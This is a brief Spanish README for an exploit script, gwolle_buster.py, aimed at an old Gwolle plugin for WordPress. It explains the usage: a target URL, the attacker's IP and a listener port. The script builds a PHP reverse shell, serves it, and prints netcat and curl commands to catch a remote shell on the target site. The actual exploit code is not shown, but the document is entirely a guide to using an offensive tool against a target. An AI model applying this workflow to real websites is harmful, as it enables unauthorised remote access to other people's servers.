
Este script es un exploit para el plugin antiguo de WordPress gwolle.
Este script es un exploit para el antiguo plugin de WordPress gwolle
uso:
./gwolle_buster.py <target_url>
primer argumento <target_url> => la URL objetivo de WordPress que tiene instalado gwolle segundo argumento => tu IP tercer argumento => puerto de escucha para la reverse shell
ejemplo: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
Este script generará el script de reverse shell en PHP y vinculará el servidor simple, por lo que necesitas abrir 2 nuevas terminales y escuchar con netcat en la primera terminal, y realizar la solicitud con comandos curl. Sin embargo, los comandos se generan automáticamente y aparecen en la consola, por lo tanto, puedes copiar y pegar fácilmente.